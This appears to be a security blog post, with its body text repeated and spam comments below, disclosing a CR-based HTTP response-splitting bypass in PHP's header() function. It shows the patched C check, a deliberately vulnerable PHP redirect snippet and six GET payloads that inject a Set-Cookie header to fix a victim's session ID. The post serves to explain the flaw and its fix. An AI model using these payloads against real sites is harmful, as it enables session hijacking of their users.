Recenlty we wrote about universal PHP bypass for header() function.
That trick is based on %0d byte instead of %0d%0a to split HTTP response.
Bug was fixed as you can see at changelog:
http://php.net/ChangeLog-5.php
And what about fix?
And as we wrote before, bug still available for Internet Explorer.
Source code:
GET /?r=split%0d+Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%20Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%09Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a+Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a%20Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a%09Set-cookie:PHPSESSID=predicated HTTP/1.1
That trick is based on %0d byte instead of %0d%0a to split HTTP response.
Bug was fixed as you can see at changelog:
http://php.net/ChangeLog-5.php
Version 5.3.11
https://bugs.php.net/bug.php?id=60227 is original bugFixed bug #60227 (header() cannot detect the multi-line header with CR).
And what about fix?
for (i = 0; i < header_line_len; i++) {
/* RFC 2616 allows new lines if followed by SP or HT */
int illegal_break =
(header_line[i+1] != ' ' && header_line[i+1] != '\t') && (
header_line[i] == '\n'
|| (header_line[i] == '\r' && header_line[i+1] != '\n'));
Pay your attention to red line.
And as we wrote before, bug still available for Internet Explorer.
Source code:
<?phpAttack vectors:
header("Location: /?asd".$_GET['r']);
?>
GET /?r=split%0d+Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%20Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%09Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a+Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a%20Set-cookie:PHPSESSID=predicated HTTP/1.1
GET /?r=split%0d%0a%09Set-cookie:PHPSESSID=predicated HTTP/1.1
Этот комментарий был удален автором.
ОтветитьУдалить
ОтветитьУдалитьБлагодарю. Это действительно очень помогло мне.
https://errorcheck.net/
آهنگ جدید
ОтветитьУдалитьپخش آهنگ
الرياض الى مصر نقل عفش من الرياض الى مصر
ОтветитьУдалитьنقل عفش بالدمام نقل عفش بالدمام
نقل عفش بالاحساء نقل عفش بالاحساء
نقل عفش داخل مكة نقل عفش داخل مكة
Thank you for the Post-it is nice to Keep it up.
ОтветитьУдалитьHinovel For PC
Students find Nursing Critical Care Essay Services as being of great assistance since they are able to seek our nursing research paper writing services and nursing essay writing help services on time.
ОтветитьУдалить